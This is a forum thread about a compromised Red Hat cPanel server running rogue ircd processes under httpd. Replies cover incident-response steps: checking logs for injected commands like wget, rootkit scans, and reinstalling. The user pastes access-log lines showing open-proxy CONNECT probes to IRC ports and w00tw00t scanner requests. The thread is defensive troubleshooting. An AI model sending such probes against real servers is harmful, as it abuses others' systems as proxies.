What is the best way to secure httpd?
I would like to know what is the best way to secure httpd? I have sometimes IRCD that appear and when i check using netstat - p they are using httpd to run on my server. I want to put an end to this quickly. What is the best method. Will mod security do the trick?
|
If you are seeing ircd being run by the httpd user, then your machine has likely been compromised. At this point it's important to determine the severity of the compromise and determine how the attacker was able to access the system. Simply re-installing or adding on mod_Security may not help if the vulnerable application is a still present.
First, could you post what distro/version of linux you're using, whether it has been updated fully with security patches, and the output from netstat (netstat -pantu) that made you suspicious. Also please list all web applications that you are using with httpd, such as PHP, bulletin-board apps, CGI/Perl scripts, other apps like awstats, etc. Second take a look at the httpd logs to see if you can find any URL entries containing bash commands like wget, cd, uname, etc or anything else suspicious. Please post any that you find. Second check /tmp and /var/tmp for any any abnormal files or dirs, especially anything owned by the httpd user. I'd also highly recommend using a tool like rkhunter or chkrootkit to search for the presence of rootkits. |
Quote:
I am using Linux ES 4 Redhat. It has been fully updated with all the security through cpanel. I don't see anything running now there after typing the netstat-pantu command. I saw alot of bandwidth being going out of my two servers and then contacted my support tech he told me it was because of irc running and to check using netstat. I am not using any web application the server which was new was online a few hours before being used by irc. How do i look at the httpd logs? I got the following from looking at /usr root@cpanel [/usr]# dir ./ aquota.user* doc/ games/ kerberos/ libexec/ lost+found/ ofed/ sbin/ src/ X11R6/ ../ bin/ etc/ include/ lib/ local/ man/ quota.user* share/ tmp@ I got the following from looking at tmp and /var/tmp / generic/ nobody-session-0.842404411946521 sess_68d43263b55564197e57bd59b9396c32 ../ .ICE-unix/ original.2.6.9-42.0.3.2006-12-2323:23:54.bootdir.backup.gz sess_c08e836dd0ba1ccc181073b8effb1bde aquota.user* lost+found/ pear/ sess_d35238a33fe340e07420fee2b6a16c98 cpbandwidth/ mysql.sock@ quota.user* sess_d811acaba5edae67779b2a86924609b2 I don't see anything that is abnormal. When i did find out about the ircd thing i logged into the server and found 1-2 txt files and 1-2 with extention c files and deleted those. There was nothing installed by the looks of it and also no signs of really of someone breaking in. I have BSD installed on one server if someone was going to break into it i would have got a email telling me. I also asked my Tech Support if i should reinstall os he said no because it was nothing major. |
I think i have solved the problem it might be a SSH issue. My server 1 which is more secure then server 2 has not had any ircd running so far and server 2 got ircd running on it just now and then i restarted httpd and it has gone. I have my ip range set on server 1 for SSH. Do you think there can be any files that i don't know about on the server?
|
Quote:
Seeing abnormal processes owned by httpd is usually indicative of someone either directly compromising (or abusing) the http service or content that is executed by the httpd process, such as PHP, CGI, etc. Often a vulnerability will allow execution of arbitrary commands, which allows an attacker to upload files or execute commands (such as ircd) with the privileges of the httpd user. This is why you'll find files or processes owned by httpd. Often the next step is to upload exploits to perform a privilege elevation attack (via a local root exploit) to allow the attacker to fully compromise the system. So it's important to determine what has occurred on the system. Alternatively, the server is initially compromised by some other means and the httpd binary replaced by a trojaned version to hide the presence of the intruder. Quote:
|
Quote:
Quote:
Quote:
Quote:
Quote:
Quote:
Quote:
|
Quote:
Quote:
Quote:
root@cpanel [/var/log/httpd]# dir ./ ../ root@cpanel [/var/log/httpd]# Quote:
Quote:
Assuming that they didn't identify the vulnerable linux server first and then specifically target it rather than the BSD system. Is the BSD system running some sort of IDS? What you mean by IDS? Quote:
|
Quote:
Code:
find / -name access_log Quote:
|
I installed and ran rkhunter-1.2.9 on a server that was used by the IRCD and i got the following
- GnuPG 1.2.6 [ Old or patched v - OpenSSL 0.9.7a [ Old or patched v The two above are in yellow and according to this are Vulnerable applications and the rest are all fine since they are in green. I might be wrong but i think that the ircd was gained access through root and then maybe used through httpd. I'm making this conclusion because this server has had the SSH secured by only allowing my ip range and have not seen IRCD since yesterday and the other server has. |
Quote:
64.62.190.36 - - [24/Dec/2006:18:55:59 -0600] "CONNECT 64.62.190.36:6667 HTTP/1.0" 405 307 64.62.190.36 - - [24/Dec/2006:18:55:59 -0600] "POST http://64.62.190.36:6667/ HTTP/1.0" 405 304 209.132.209.54 - - [24/Dec/2006:18:55:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 411 64.62.190.36 - - [24/Dec/2006:18:56:30 -0600] "CONNECT 64.62.190.36:6667 HTTP/1.0" 405 307 64.62.190.36 - - [24/Dec/2006:18:56:30 -0600] "POST http://64.62.190.36:6667/ HTTP/1.0" 405 304 217.174.199.221 - - [25/Dec/2006:14:00:03 -0600] "CONNECT 195.225.204.235:6667 HTTP/1.0" 405 307 217.174.199.221 - - [25/Dec/2006:14:00:03 -0600] "POST http://195.225.204.235:6667/ HTTP/1.0" 405 304 217.174.199.221 - - [25/Dec/2006:14:00:03 -0600] "GET http://vega.epiknet.org/bopmcheck.txt HTTP/1.0" 404 - Quote:
|
Those log messages all appear to have 400 status codes, meaning they failed. Anything in the logs with 200 http status codes ?(look at 2nd to last field in each entry)
Also so you remember where you found the strange files? Who owned them? |
Quote:
62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 62.141.52.232 - - [26/Dec/2006:15:33:59 -0600] "GET /w00tw00t.at.ISC.SANS.DFind) HTTP/1.1" 400 413 Quote:
|
Those URLs are common scans. If you received a lot of those in a short time, it would certainly use up bandwidth. But it doesn't look to be related to the compromise.
Quote:
Quote:
BTW, sorry for taking so long to get back to you, but my family and I have been fighting off a stomach virus for the last 3 days. |
Quote:
Quote:
Quote:
|
Quote:
In a nutshell: if root access was gained, you can not trust anything in the compromised system, thereby you should immediately unplug the system from any network activity, be it LAN or WAN, hence avoiding the risk that your system is abusing other systems in the local network or in the internet, make a byte-to-byte copy of the system for later analysis, and reinstall the system from a trusted media. |
All times are GMT -5. The time now is 06:52 AM. |